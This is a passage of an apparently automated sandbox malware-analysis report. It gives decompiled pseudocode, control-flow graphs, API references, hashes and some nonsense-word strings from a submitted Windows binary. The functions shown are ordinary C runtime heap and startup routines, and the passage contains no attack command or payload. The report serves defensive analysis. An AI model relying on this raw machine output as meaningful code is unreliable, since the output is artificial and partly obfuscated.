    • Sabet xedalihi gicise mopof ribilok, xrefs: 00B78926
    • Fotew gadet vaxecafo boc roqueh, xrefs: 00B78938
    • Sele cegen tarexan, xrefs: 00B789AB
    • sivawil copace coca pisej queh poxeki wicevaq, xrefs: 00B78959
    • kijosop, xrefs: 00B78921
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: FiberFileString$ApisCommCreateDeleteErrorExitFindFoldLastMovePathProcessResetSearchSectionSwitchThreadTimeoutsTransactedWatchWrite_malloc
    • String ID: Fotew gadet vaxecafo boc roqueh$Mifi vako leyoni famegof kohev kiwiheta gajibig$Sabet xedalihi gicise mopof ribilok$Sele cegen tarexan$Vite fodi malavi quakosel mewaril quefes quogo cabeme heg quamowi$jan qued cahirek hite sonanon$kijosop$sipoq negarir$sivawil copace coca pisej queh poxeki wicevaq
    • API String ID: 3896758673-1149523976
    • Opcode ID: 36a0cd2cd7880758d8dfc99cb6073133a26013a4f324e3b9ea63a9f30f019ac3
    • Instruction ID: 9bcff98f6c22ac7db810aa0269c0dcd9bf3bf9095dc1b96d3d5ba60917611020
    • Opcode Fuzzy Hash: 36a0cd2cd7880758d8dfc99cb6073133a26013a4f324e3b9ea63a9f30f019ac3
    • Instruction Fuzzy Hash: B4212C746C4344FBE710DBA8ED4EF9836A4FB04B16F108584F61DAA1E0CEB069C48B65
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 77 b7dfe7-b7dff8 78 b7e04f-b7e05e 77->78 79 b7dffa-b7e008 77->79 80 b7e060-b7e069 78->80 81 b7e06c-b7e073 78->81 82 b7e040-b7e049 79->82 83 b7e00a-b7e011 call b7f2d0 79->83 80->81 84 b7e06b 80->84 85 b7e075-b7e098 81->85 86 b7e0ea-b7e0f6 81->86 82->78 91 b7e034-b7e03e 83->91 92 b7e013-b7e031 call b7d760 83->92 84->81 85->86 101 b7e09a-b7e09e 85->101 88 b7e109-b7e10d 86->88 89 b7e0f8-b7e100 86->89 94 b7e10f-b7e12b call b89ed0 88->94 95 b7e13c-b7e148 88->95 89->88 93 b7e102 89->93 91->78 92->91 108 b7e033 92->108 93->88 112 b7e12e-b7e137 94->112 113 b7e12d 94->113 98 b7e184-b7e191 call b89e10 95->98 99 b7e14a-b7e14e 95->99 111 b7e196-b7e1a0 98->111 99->98 103 b7e150-b7e15c 99->103 106 b7e0c5-b7e0e2 call b89ed0 101->106 107 b7e0a0-b7e0c0 call b89ed0 101->107 103->98 109 b7e15e-b7e162 103->109 125 b7e0e5 106->125 126 b7e0e4 106->126 122 b7e0c3 107->122 123 b7e0c2 107->123 108->91 109->98 117 b7e164-b7e181 call b89ed0 109->117 119 b7e1a2-b7e1ab 111->119 120 b7e1b0-b7e1c3 111->120 116 b7e322-b7e34f call b7e330 112->116 113->112 117->98 136 b7e183 117->136 119->116 127 b7e1c5-b7e209 120->127 128 b7e20e-b7e21a 120->128 122->125 123->122 125->116 126->125 133 b7e2c8-b7e31f call b81bb0 * 3 127->133 129 b7e22d 128->129 130 b7e21c-b7e22b 128->130 134 b7e237-b7e250 129->134 130->134 133->116 138 b7e252-b7e258 134->138 139 b7e25e-b7e265 134->139 136->98 138->139 141 b7e267-b7e272 139->141 142 b7e274-b7e277 139->142 144 b7e27d-b7e2c2 141->144 142->144 144->133
    C-Code - Quality: 61%
    			E00B7DFE7() {
    				signed int _t79;
    				signed int _t80;
    				intOrPtr _t81;
    				signed int _t97;
    				void* _t102;
    				void* _t103;
    				signed int _t105;
    				void* _t109;
    				void* _t110;
    				intOrPtr _t112;
    				void* _t115;
    				void* _t116;
    				signed int _t122;
    				signed int _t123;
    				intOrPtr _t126;
    				signed int _t127;
    				signed int _t157;
    				intOrPtr _t158;
    				intOrPtr _t159;
    				signed int _t169;
    				signed int _t170;
    				void* _t171;
    				void* _t173;
    				void* _t175;
    				void* _t177;
    				void* _t178;
    				void* _t188;
    				void* _t192;
    
    				_t178 = _t177 + 4;
    				 *(_t175 - 4) = 0;
    				if( *0xd12404 > 0) {
    					_t112 =  *0xd12404; // 0x0
    					_t188 =  *0xd123ec - _t112 - 1; // 0x0
    					if(_t188 != 0) {
    						_t169 =  *0xd123ec; // 0x0
    						_t170 = _t169 + 1;
    						__eflags = _t170;
    						 *0xd123ec = _t170;
    					} else {
    						if(E00B7F2D0() == 0) {
    							_push(L"_CrtCheckMemory()");
    							_push(0);
    							_push(0x179);
    							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c");
    							_push(2);
    							_t115 = L00B7D760();
    							_t178 = _t178 + 0x14;
    							if(_t115 == 1) {
    								asm("int3");
    							}
    						}
    						 *0xd123ec = 0;
    					}
    				}
    				_t79 =  *0xd1132c; // 0x36
    				 *(_t175 - 0x28) = _t79;
    				if( *0xd11330 != 0xffffffff) {
    					_t192 =  *(_t175 - 0x28) -  *0xd11330; // 0xffffffff
    					if(_t192 == 0) {
    						asm("int3");
    					}
    				}
    				if( *0xd11d74 == 0) {
    					L19:
    					__eflags = ( *(_t175 + 0xc) & 0x0000ffff) - 2;
    					if(( *(_t175 + 0xc) & 0x0000ffff) != 2) {
    						_t105 =  *0xd11324; // 0x1
    						__eflags = _t105 & 0x00000001;
    						if((_t105 & 0x00000001) == 0) {
    							 *(_t175 - 0x1c) = 1;
    						}
    					}
    					__eflags =  *((intOrPtr*)(_t175 + 8)) - 0xffffffbc;
    					if( *((intOrPtr*)(_t175 + 8)) <= 0xffffffbc) {
    						__eflags = ( *(_t175 + 0xc) & 0x0000ffff) - 4;
    						if(( *(_t175 + 0xc) & 0x0000ffff) != 4) {
    							__eflags =  *(_t175 + 0xc) - 1;
    							if( *(_t175 + 0xc) != 1) {
    								__eflags = ( *(_t175 + 0xc) & 0x0000ffff) - 2;
    								if(( *(_t175 + 0xc) & 0x0000ffff) != 2) {
    									__eflags =  *(_t175 + 0xc) - 3;
    									if( *(_t175 + 0xc) != 3) {
    										_t102 = L00B89ED0(1, 0, 0, 0, "%s", "Error: memory allocation: bad memory block type.\n");
    										_t178 = _t178 + 0x18;
    										__eflags = _t102 - 1;
    										if(_t102 == 1) {
    											asm("int3");
    										}
    									}
    								}
    							}
    						}
    						 *((intOrPtr*)(_t175 - 0x2c)) =  *((intOrPtr*)(_t175 + 8)) + 0x24;
    						_t80 = E00B89E10(_t116, _t171, _t173,  *((intOrPtr*)(_t175 - 0x2c))); // executed
    						 *(_t175 - 0x24) = _t80;
    						__eflags =  *(_t175 - 0x24);
    						if( *(_t175 - 0x24) != 0) {
    							_t122 =  *0xd1132c; // 0x36
    							_t123 = _t122 + 1;
    							 *0xd1132c = _t123;
    							__eflags =  *(_t175 - 0x1c);
    							if( *(_t175 - 0x1c) == 0) {
    								__eflags = (_t123 | 0xffffffff) -  *0xd123e4 -  *((intOrPtr*)(_t175 + 8));
    								if((_t123 | 0xffffffff) -  *0xd123e4 <=  *((intOrPtr*)(_t175 + 8))) {
    									 *0xd123e4 = 0xffffffff;
    								} else {
    									_t159 =  *0xd123e4; // 0x75140c
    									 *0xd123e4 = _t159 +  *((intOrPtr*)(_t175 + 8));
    								}
    								_t81 =  *0xd123fc; // 0x1745f6
    								 *0xd123fc = _t81 +  *((intOrPtr*)(_t175 + 8));
    								_t126 =  *0xd123fc; // 0x1745f6
    								__eflags = _t126 -  *0xd123f0; // 0x74fd62
    								if(__eflags > 0) {
    									_t158 =  *0xd123fc; // 0x1745f6
    									 *0xd123f0 = _t158;
    								}
    								__eflags =  *0xd123f4;
    								if( *0xd123f4 == 0) {
    									 *0xd123e8 =  *(_t175 - 0x24);
    								} else {
    									_t97 =  *0xd123f4; // 0x34a5020
    									 *(_t97 + 4) =  *(_t175 - 0x24);
    								}
    								_t127 =  *0xd123f4; // 0x34a5020
    								 *( *(_t175 - 0x24)) = _t127;
    								 *( *(_t175 - 0x24) + 4) = 0;
    								 *( *(_t175 - 0x24) + 8) =  *(_t175 + 0x10);
    								 *((intOrPtr*)( *(_t175 - 0x24) + 0xc)) =  *((intOrPtr*)(_t175 + 0x14));
    								 *((intOrPtr*)( *(_t175 - 0x24) + 0x10)) =  *((intOrPtr*)(_t175 + 8));
    								 *( *(_t175 - 0x24) + 0x14) =  *(_t175 + 0xc);
    								 *( *(_t175 - 0x24) + 0x18) =  *(_t175 - 0x28);
    								 *0xd123f4 =  *(_t175 - 0x24);
    							} else {
    								 *( *(_t175 - 0x24)) = 0;
    								 *( *(_t175 - 0x24) + 4) = 0;
    								 *( *(_t175 - 0x24) + 8) = 0;
    								 *((intOrPtr*)( *(_t175 - 0x24) + 0xc)) = 0xfedcbabc;
    								 *((intOrPtr*)( *(_t175 - 0x24) + 0x10)) =  *((intOrPtr*)(_t175 + 8));
    								 *( *(_t175 - 0x24) + 0x14) = 3;
    								 *( *(_t175 - 0x24) + 0x18) = 0;
    							}
    							E00B81BB0(_t171,  *(_t175 - 0x24) + 0x1c,  *0xd11334 & 0x000000ff, 4);
    							E00B81BB0(_t171,  *(_t175 - 0x24) +  *((intOrPtr*)(_t175 + 8)) + 0x20,  *0xd11334 & 0x000000ff, 4);
    							E00B81BB0(_t171,  *(_t175 - 0x24) + 0x20,  *0xd11337 & 0x000000ff,  *((intOrPtr*)(_t175 + 8)));
    							_t157 =  *(_t175 - 0x24) + 0x20;
    							__eflags = _t157;
    							 *(_t175 - 0x20) = _t157;
    						} else {
    							 *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x18)))) = 0xc;
    						}
    					} else {
    						_t103 = L00B89ED0(1, 0, 0, 0, "Invalid allocation size: %Iu bytes.\n",  *((intOrPtr*)(_t175 + 8)));
    						__eflags = _t103 - 1;
    						if(_t103 == 1) {
    							asm("int3");
    						}
    						 *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x18)))) = 0xc;
    					}
    					L46:
    					 *(_t175 - 4) = 0xfffffffe;
    					E00B7E330();
    					 *[fs:0x0] =  *((intOrPtr*)(_t175 - 0x10));
    					return  *(_t175 - 0x20);
    				}
    				_t109 =  *0xd11d74(1, 0,  *((intOrPtr*)(_t175 + 8)),  *(_t175 + 0xc),  *(_t175 - 0x28),  *(_t175 + 0x10),  *((intOrPtr*)(_t175 + 0x14)));
    				_t178 = _t178 + 0x1c;
    				if(_t109 != 0) {
    					goto L19;
    				}
    				if( *(_t175 + 0x10) == 0) {
    					_t110 = L00B89ED0(0, 0, 0, 0, "%s", "Client hook allocation failure.\n");
    					__eflags = _t110 - 1;
    					if(_t110 == 1) {
    						asm("int3");
    					}
    					L18:
    					goto L46;
    				}
    				_push( *((intOrPtr*)(_t175 + 0x14)));
    				if(L00B89ED0(0, 0, 0, 0, "Client hook allocation failure at file %hs line %d.\n",  *(_t175 + 0x10)) == 1) {
    					asm("int3");
    				}
    				goto L18;
    			}































    0x00b7dfe7
    0x00b7dfea
    0x00b7dff8
    0x00b7dffa
    0x00b7e002
    0x00b7e008
    0x00b7e040
    0x00b7e046
    0x00b7e046
    0x00b7e049
    0x00b7e00a
    0x00b7e011
    0x00b7e013
    0x00b7e018
    0x00b7e01a
    0x00b7e01f
    0x00b7e024
    0x00b7e026
    0x00b7e02b
    0x00b7e031
    0x00b7e033
    0x00b7e033
    0x00b7e031
    0x00b7e034
    0x00b7e034
    0x00b7e008
    0x00b7e04f
    0x00b7e054
    0x00b7e05e
    0x00b7e063
    0x00b7e069
    0x00b7e06b
    0x00b7e06b
    0x00b7e069
    0x00b7e073
    0x00b7e0ea
    0x00b7e0f3
    0x00b7e0f6
    0x00b7e0f8
    0x00b7e0fd
    0x00b7e100
    0x00b7e102
    0x00b7e102
    0x00b7e100
    0x00b7e109
    0x00b7e10d
    0x00b7e145
    0x00b7e148
    0x00b7e14a
    0x00b7e14e
    0x00b7e159
    0x00b7e15c
    0x00b7e15e
    0x00b7e162
    0x00b7e176
    0x00b7e17b
    0x00b7e17e
    0x00b7e181
    0x00b7e183
    0x00b7e183
    0x00b7e181
    0x00b7e162
    0x00b7e15c
    0x00b7e14e
    0x00b7e18a
    0x00b7e191
    0x00b7e199
    0x00b7e19c
    0x00b7e1a0
    0x00b7e1b0
    0x00b7e1b6
    0x00b7e1b9
    0x00b7e1bf
    0x00b7e1c3
    0x00b7e217
    0x00b7e21a
    0x00b7e22d
    0x00b7e21c
    0x00b7e21c
    0x00b7e225
    0x00b7e225
    0x00b7e237
    0x00b7e23f
    0x00b7e244
    0x00b7e24a
    0x00b7e250
    0x00b7e252
    0x00b7e258
    0x00b7e258
    0x00b7e25e
    0x00b7e265
    0x00b7e277
    0x00b7e267
    0x00b7e267
    0x00b7e26f
    0x00b7e26f
    0x00b7e280
    0x00b7e286
    0x00b7e28b
    0x00b7e298
    0x00b7e2a1
    0x00b7e2aa
    0x00b7e2b3
    0x00b7e2bc
    0x00b7e2c2
    0x00b7e1c5
    0x00b7e1c8
    0x00b7e1d1
    0x00b7e1db
    0x00b7e1e5
    0x00b7e1f2
    0x00b7e1f8
    0x00b7e202
    0x00b7e202
    0x00b7e2d9
    0x00b7e2f6
    0x00b7e311
    0x00b7e31c
    0x00b7e31c
    0x00b7e31f
    0x00b7e1a2
    0x00b7e1a5
    0x00b7e1a5
    0x00b7e10f
    0x00b7e120
    0x00b7e128
    0x00b7e12b
    0x00b7e12d
    0x00b7e12d
    0x00b7e131
    0x00b7e131
    0x00b7e322
    0x00b7e322
    0x00b7e329
    0x00b7e341
    0x00b7e34f
    0x00b7e34f
    0x00b7e08d
    0x00b7e093
    0x00b7e098
    0x00000000
    0x00000000
    0x00b7e09e
    0x00b7e0d7
    0x00b7e0df
    0x00b7e0e2
    0x00b7e0e4
    0x00b7e0e4
    0x00b7e0e5
    0x00000000
    0x00b7e0e5
    0x00b7e0a3
    0x00b7e0c0
    0x00b7e0c2
    0x00b7e0c2
    0x00000000

    APIs
    Strings
    • Client hook allocation failure., xrefs: 00B7E0C5
    • Client hook allocation failure at file %hs line %d., xrefs: 00B7E0A8
    • Error: memory allocation: bad memory block type., xrefs: 00B7E164
    • _CrtCheckMemory(), xrefs: 00B7E013
    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 00B7E01F
    • Invalid allocation size: %Iu bytes., xrefs: 00B7E113
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: _memset$CheckMemory__heap_alloc_base
    • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
    • API String ID: 4254127243-2462871736
    • Opcode ID: 75c42ce20252b6829cc30c553d4fdc98138ebf3a2fd6d32b299921454e67cea8
    • Instruction ID: cfd1add74e52daa6a3d1216b314401985ff73fb4bc14a2ce173abb98baac277c
    • Opcode Fuzzy Hash: 75c42ce20252b6829cc30c553d4fdc98138ebf3a2fd6d32b299921454e67cea8
    • Instruction Fuzzy Hash: 1CA17774A00204ABDB18DF48DD92BA977F1EF48310F20C199E939AB3A1C772E951CF65
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 97%
    			E00B7CE45() {
    				void* _t21;
    				void* _t22;
    				void* _t25;
    				intOrPtr _t27;
    				void* _t29;
    				intOrPtr _t30;
    				intOrPtr _t32;
    				intOrPtr _t34;
    				void* _t44;
    				void* _t46;
    				void* _t54;
    				void* _t56;
    				void* _t58;
    				void* _t60;
    				void* _t61;
    				void* _t62;
    
    				 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
    				 *((intOrPtr*)(_t58 - 0x6c)) = E00B7CFE0();
    				_t21 = E00B86D60(_t46, 1); // executed
    				_t61 = _t60 + 4;
    				if(_t21 == 0) {
    					E00B7CFB0(0x1c);
    					_t61 = _t61 + 4; // executed
    				}
    				_t22 = L00B84AC0(_t46); // executed
    				if(_t22 == 0) {
    					E00B7CFB0(0x10);
    					_t61 = _t61 + 4;
    				}
    				_push(1);
    				E00B800B0(_t46);
    				_t62 = _t61 + 4;
    				E00B86CE0();
    				 *((intOrPtr*)(_t58 - 4)) = 1;
    				_t25 = E00B86840(); // executed
    				if(_t25 < 0) {
    					L00B859E0(_t44, _t46, _t54, _t56, 0x1b);
    					_t62 = _t62 + 4;
    				}
    				 *0xd14164 = E00B86830(); // executed
    				_t27 = E00B86780(_t44, _t54, _t56); // executed
    				 *0xd123d8 = _t27;
    				if(E00B86390() < 0) {
    					L00B859E0(_t44, _t46, _t54, _t56, 8);
    					_t62 = _t62 + 4; // executed
    				}
    				_t29 = E00B861F0(_t44, _t54, _t56); // executed
    				if(_t29 < 0) {
    					L00B859E0(_t44, _t46, _t54, _t56, 9);
    					_t62 = _t62 + 4;
    				}
    				_t30 = E00B858C0(_t46, 1); // executed
    				 *((intOrPtr*)(_t58 - 0x64)) = _t30;
    				if( *((intOrPtr*)(_t58 - 0x64)) != 0) {
    					L00B859E0(_t44,  *((intOrPtr*)(_t58 - 0x64)), _t54, _t56,  *((intOrPtr*)(_t58 - 0x64)));
    				}
    				 *((intOrPtr*)(_t58 - 0x68)) = E00B86150();
    				if(( *(_t58 - 0x34) & 0x00000001) == 0) {
    					 *(_t58 - 0x7c) = 0xa;
    				} else {
    					 *(_t58 - 0x7c) =  *(_t58 - 0x30) & 0x0000ffff;
    				}
    				_t32 = E00B7A350(_t44, _t54, 0xb70000, 0,  *((intOrPtr*)(_t58 - 0x68)),  *(_t58 - 0x7c)); // executed
    				 *((intOrPtr*)(_t58 - 0x70)) = _t32;
    				if( *((intOrPtr*)(_t58 - 0x6c)) == 0) {
    					E00B85960( *((intOrPtr*)(_t58 - 0x70)));
    				}
    				E00B859A0();
    				 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
    				_t34 =  *((intOrPtr*)(_t58 - 0x70));
    				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0x10));
    				return _t34;
    			}



















    0x00b7ce45
    0x00b7ce51
    0x00b7ce56
    0x00b7ce5b
    0x00b7ce60
    0x00b7ce64
    0x00b7ce69
    0x00b7ce69
    0x00b7ce6c
    0x00b7ce73
    0x00b7ce77
    0x00b7ce7c
    0x00b7ce7c
    0x00b7ce7f
    0x00b7ce81
    0x00b7ce86
    0x00b7ce89
    0x00b7ce8e
    0x00b7ce95
    0x00b7ce9c
    0x00b7cea0
    0x00b7cea5
    0x00b7cea5
    0x00b7cead
    0x00b7ceb2
    0x00b7ceb7
    0x00b7cec3
    0x00b7cec7
    0x00b7cecc
    0x00b7cecc
    0x00b7cecf
    0x00b7ced6
    0x00b7ceda
    0x00b7cedf
    0x00b7cedf
    0x00b7cee4
    0x00b7ceec
    0x00b7cef3
    0x00b7cef9
    0x00b7cefe
    0x00b7cf06
    0x00b7cf0f
    0x00b7cf1a
    0x00b7cf11
    0x00b7cf15
    0x00b7cf15
    0x00b7cf30
    0x00b7cf35
    0x00b7cf3c
    0x00b7cf42
    0x00b7cf42
    0x00b7cf47
    0x00b7cf4c
    0x00b7cf94
    0x00b7cf9a
    0x00b7cfa8

    APIs
    • _check_managed_app.LIBCMTD ref: 00B7CE4C
    • __heap_init.LIBCMTD ref: 00B7CE56
      • Part of subcall function 00B86D60: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00B7CE5B,00000001), ref: 00B86D76
    • _fast_error_exit.LIBCMTD ref: 00B7CE64
      • Part of subcall function 00B7CFB0: ___crtExitProcess.LIBCMTD ref: 00B7CFD4
    • _fast_error_exit.LIBCMTD ref: 00B7CE77
    • __RTC_Initialize.LIBCMTD ref: 00B7CE89
    • ___crtGetEnvironmentStringsW.LIBCMTD ref: 00B7CEB2
    • ___wsetargv.LIBCMTD ref: 00B7CEBC
    • __wsetenvp.LIBCMTD ref: 00B7CECF
    • __cinit.LIBCMTD ref: 00B7CEE4
    • __wwincmdln.LIBCMTD ref: 00B7CF01
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: ___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___wsetargv__cinit__heap_init__wsetenvp__wwincmdln_check_managed_app
    • String ID: O|
    • API String ID: 3184702096-3395549761
    • Opcode ID: 886ac2d39f2037098c27bd06c02d9dfe6482754538b97d6e2c4f03e6a49d8181
    • Instruction ID: 53a69980b7e073e9935278b0aaed2f765cd11362018c7b172e9e290fd62f0847
    • Opcode Fuzzy Hash: 886ac2d39f2037098c27bd06c02d9dfe6482754538b97d6e2c4f03e6a49d8181
    • Instruction Fuzzy Hash: 7C3141B1D007049AEB10BBF0A80379E76F1AB50754F1081EDF92DAB293FB719945CB92
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 209 b86840-b868da GetStartupInfoA call b7e420 213 b868dc-b868df 209->213 214 b868e4-b868f7 209->214 216 b86cca-b86cdb 213->216 215 b86902-b8690f 214->215 217 b8696f-b86975 215->217 218 b86911-b8696d 215->218 220 b8697b-b8697f 217->220 221 b86b73-b86b89 217->221 218->215 220->221 223 b86985-b869a6 220->223 224 b86cbb-b86cc8 SetHandleCount 221->224 225 b86b8f-b86ba4 221->225 226 b869a8-b869b1 223->226 227 b869b3 223->227 224->216 228 b86bb2-b86bbd 225->228 229 b86ba6-b86bac 225->229 230 b869bd-b869cd 226->230 227->230 232 b86bcb-b86bd8 228->232 233 b86bbf-b86bc9 228->233 229->228 231 b86ca4-b86cb3 229->231 234 b869d8-b869e1 230->234 237 b86cb6 231->237 238 b86bde-b86bf2 GetStdHandle 232->238 233->238 235 b86aa3-b86aaa 234->235 236 b869e7-b86a06 call b7e420 234->236 240 b86ac7-b86acd 235->240 248 b86a08-b86a10 236->248 249 b86a15-b86a2f 236->249 237->224 241 b86bf8-b86bfc 238->241 242 b86c89-b86c9c 238->242 240->221 246 b86ad3-b86ad9 240->246 241->242 243 b86c02-b86c13 GetFileType 241->243 245 b86ca2 242->245 243->242 247 b86c15-b86c29 243->247 245->237 250 b86b6e 246->250 251 b86adf-b86ae5 246->251 252 b86c2b-b86c3b 247->252 253 b86c3d-b86c49 247->253 248->235 254 b86a3a-b86a4c 249->254 250->240 251->250 256 b86aeb-b86af4 251->256 257 b86c5b-b86c71 call b8e240 252->257 253->257 258 b86c4b-b86c58 253->258 259 b86a9e 254->259 260 b86a4e-b86a9c 254->260 256->250 261 b86af6-b86aff 256->261 270 b86c78-b86c87 257->270 271 b86c73-b86c76 257->271 258->257 259->234 260->254 262 b86b11-b86b55 call b8e240 261->262 263 b86b01-b86b0f GetFileType 261->263 272 b86b5f-b86b6b 262->272 273 b86b57-b86b5a 262->273 263->250 263->262 270->245 271->216 272->250 273->216
    C-Code - Quality: 93%
    			E00B86840() {
    				void* _v8;
    				signed int _v12;
    				char _v20;
    				intOrPtr _v28;
    				struct _STARTUPINFOA _v100;
    				signed int _v104;
    				signed int _v108;
    				signed int _v112;
    				int _v116;
    				signed char* _v120;
    				void* _v124;
    				void** _v128;
    				void** _v132;
    				int _v140;
    				long _v144;
    				signed int _t166;
    				signed int _t170;
    				signed int _t175;
    				signed int _t188;
    				signed int _t206;
    				void** _t209;
    				signed int _t321;
    				void* _t322;
    				intOrPtr _t323;
    				void* _t324;
    
    				_push(0xfffffffe);
    				_push(0xd0f728);
    				_push(E00B812B0);
    				_push( *[fs:0x0]);
    				_t323 = _t322 + 0xffffff84;
    				_t166 =  *0xd11338; // 0x8bc2db00
    				_v12 = _v12 ^ _t166;
    				_push(_t166 ^ _t321);
    				 *[fs:0x0] =  &_v20;
    				_v28 = _t323;
    				_v8 = 0;
    				GetStartupInfoA( &_v100);
    				_v8 = 0xfffffffe;
    				_t170 = L00B7E420(0x20, 0x40, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\ioinit.c", 0x88); // executed
    				_t324 = _t323 + 0x14;
    				_v128 = _t170;
    				if(_v128 != 0) {
    					 *0xd13040 = _v128;
    					 *0xd13020 = 0x20;
    					while(_v128 <  *0xd13040 + 0x800) {
    						_v128[1] = 0;
    						 *_v128 = 0xffffffff;
    						_v128[1] = 0xa;
    						_v128[2] = 0;
    						_v128[9] = _v128[9] & 0x00000080;
    						_v128[9] = _v128[9] & 0x0000007f;
    						_v128[9] = 0xa;
    						_v128[9] = 0xa;
    						_v128[0xe] = 0;
    						_v128[0xd] = 0;
    						_v128 =  &(_v128[0x10]);
    					}
    					if((_v100.cbReserved2 & 0x0000ffff) == 0 || _v100.lpReserved2 == 0) {
    						L34:
    						_v112 = 0;
    						while(_v112 < 3) {
    							_v128 = (_v112 << 6) +  *0xd13040;
    							if( *_v128 == 0xffffffff ||  *_v128 == 0xfffffffe) {
    								_v128[1] = 0x81;
    								if(_v112 != 0) {
    									asm("sbb edx, edx");
    									_v144 =  ~(_v112 - 1) + 0xfffffff5;
    								} else {
    									_v144 = 0xfffffff6;
    								}
    								_v124 = GetStdHandle(_v144);
    								if(_v124 == 0xffffffff || _v124 == 0) {
    									L52:
    									_v128[1] = _v128[1] | 0x00000040;
    									 *_v128 = 0xfffffffe;
    									goto L53;
    								} else {
    									_v108 = GetFileType(_v124);
    									if(_v108 == 0) {
    										goto L52;
    									} else {
    										 *_v128 = _v124;
    										if((_v108 & 0x000000ff) != 2) {
    											if((_v108 & 0x000000ff) == 3) {
    												_v128[1] = _v128[1] | 0x00000008;
    											}
    										} else {
    											_v128[1] = _v128[1] | 0x00000040;
    										}
    										_t188 = E00B8E240( &(_v128[3]), 0xfa0);
    										_t324 = _t324 + 8;
    										if(_t188 != 0) {
    											_v128[2] = _v128[2] + 1;
    											L53:
    											goto L55;
    										} else {
    											_t175 = _t188 | 0xffffffff;
    										}
    									}
    								}
    							} else {
    								_v128[1] = _v128[1] | 0x00000080;
    								L55:
    								_v112 = _v112 + 1;
    								continue;
    							}
    							goto L57;
    						}
    						SetHandleCount( *0xd13020);
    						_t175 = 0;
    					} else {
    						_v116 =  *(_v100.lpReserved2);
    						_v120 = _v100.lpReserved2 + 4;
    						_v132 =  &(_v120[_v116]);
    						if(_v116 >= 0x800) {
    							_v140 = 0x800;
    						} else {
    							_v140 = _v116;
    						}
    						_v116 = _v140;
    						_v104 = 1;
    						while( *0xd13020 < _v116) {
    							_t209 = L00B7E420(0x20, 0x40, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\ioinit.c", 0xc0);
    							_t324 = _t324 + 0x14;
    							_v128 = _t209;
    							if(_v128 != 0) {
    								 *((intOrPtr*)(0xd13040 + _v104 * 4)) = _v128;
    								 *0xd13020 =  *0xd13020 + 0x20;
    								while(_v128 <  *((intOrPtr*)(0xd13040 + _v104 * 4)) + 0x800) {
    									_v128[1] = 0;
    									 *_v128 = 0xffffffff;
    									_v128[1] = 0xa;
    									_v128[2] = 0;
    									_v128[9] = _v128[9] & 0x00000080;
    									_v128[9] = 0xa;
    									_v128[9] = 0xa;
    									_v128[0xe] = 0;
    									_v128[0xd] = 0;
    									_v128 =  &(_v128[0x10]);
    								}
    								_v104 = _v104 + 1;
    								continue;
    							} else {
    								_v116 =  *0xd13020;
    							}
    							break;
    						}
    						_v112 = 0;
    						while(_v112 < _v116) {
    							if( *_v132 == 0xffffffff ||  *_v132 == 0xfffffffe || ( *_v120 & 0x00000001) == 0 || ( *_v120 & 0x00000008) == 0 && GetFileType( *_v132) == 0) {
    								L33:
    								_v112 = _v112 + 1;
    								_v120 =  &(_v120[1]);
    								_v132 =  &(_v132[1]);
    								continue;
    							} else {
    								_v128 = ((_v112 & 0x0000001f) << 6) +  *((intOrPtr*)(0xd13040 + (_v112 >> 5) * 4));
    								 *_v128 =  *_v132;
    								_v128[1] =  *_v120;
    								_t206 = E00B8E240( &(_v128[3]), 0xfa0);
    								_t324 = _t324 + 8;
    								if(_t206 != 0) {
    									_v128[2] =  *((intOrPtr*)(_v128 + 8)) + 1;
    									goto L33;
    								} else {
    									_t175 = _t206 | 0xffffffff;
    								}
    							}
    							goto L57;
    						}
    						goto L34;
    					}
    				} else {
    					_t175 = _t170 | 0xffffffff;
    				}
    				L57:
    				 *[fs:0x0] = _v20;
    				return _t175;
    			}




























    0x00b86845
    0x00b86847
    0x00b8684c
    0x00b86857
